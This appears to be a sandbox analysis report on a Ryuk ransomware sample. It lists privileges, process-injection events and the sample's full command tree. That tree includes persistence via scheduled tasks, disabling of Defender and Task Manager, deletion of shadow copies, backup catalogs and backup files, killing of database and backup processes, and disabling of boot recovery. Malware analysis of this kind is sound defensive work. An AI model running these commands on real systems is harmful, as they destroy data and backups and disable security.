Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4244 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 364 wrote to memory of 664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 364 wrote to memory of 664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 364 wrote to memory of 664 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4156 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 2308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 5080 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5080 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5080 wrote to memory of 3024 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1072 wrote to memory of 4008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1072 wrote to memory of 4008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1072 wrote to memory of 4008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4244 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 3976 wrote to memory of 3776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3976 wrote to memory of 3776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3976 wrote to memory of 3776 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 220 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 220 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 220 wrote to memory of 224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4244 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4308 wrote to memory of 3484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4308 wrote to memory of 3484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4308 wrote to memory of 3484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4244 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4500 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4500 wrote to memory of 4736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4500 wrote to memory of 4736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4500 wrote to memory of 4736 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 4244 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1728 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1728 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1728 wrote to memory of 4420 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4244 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 4248 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4248 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4248 wrote to memory of 4212 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4248 wrote to memory of 780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4248 wrote to memory of 780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4248 wrote to memory of 780 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 4244 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe

"C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt

C:\Windows\SysWOW64\net.exe

net stop avpsus /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\SysWOW64\net.exe

net stop McAfeeDLPAgentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McAfeeDLPAgentService /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop mfewc /y

C:\Windows\SysWOW64\net.exe

net stop mfewc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfewc /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y

C:\Windows\SysWOW64\net.exe

net stop BMR Boot Service /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BMR Boot Service /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y

C:\Windows\SysWOW64\net.exe

net stop NetBackup BMR MTFTP Service /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled

C:\Windows\SysWOW64\sc.exe

sc config SQLTELEMETRY start=disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SQLTELEMETRY$ECWDB2 start= disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SQLWriter start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SQLWriter start= disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc config SstpSvc start= disabled

C:\Windows\SysWOW64\sc.exe

sc config SstpSvc start= disabled

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mspub.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM mspub.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopqos.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM mydesktopqos.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c taskkill /IM mydesktopservice.exe /F

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM mydesktopservice.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q c:*.bac c:*.bak c:*.wbcat c:*.bkf c:Backup*.* c:ackup*.* c:*.set c:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q d:*.bac d:*.bak d:*.wbcat d:*.bkf d:Backup*.* d:ackup*.* d:*.set d:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q e:*.bac e:*.bak e:*.wbcat e:*.bkf e:Backup*.* e:ackup*.* e:*.set e:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q f:*.bac f:*.bak f:*.wbcat f:*.bkf f:Backup*.* f:ackup*.* f:*.set f:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q g:*.bac g:*.bak g:*.wbcat g:*.bkf g:Backup*.* g:ackup*.* g:*.set g:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del /s /f /q h:*.bac h:*.bak h:*.wbcat h:*.bkf h:Backup*.* h:ackup*.* h:*.set h:*.win

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c del %0

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s hrmlog2

C:\Windows\SysWOW64\attrib.exe

attrib +h +s hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\attrib.exe

attrib +h +s C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f

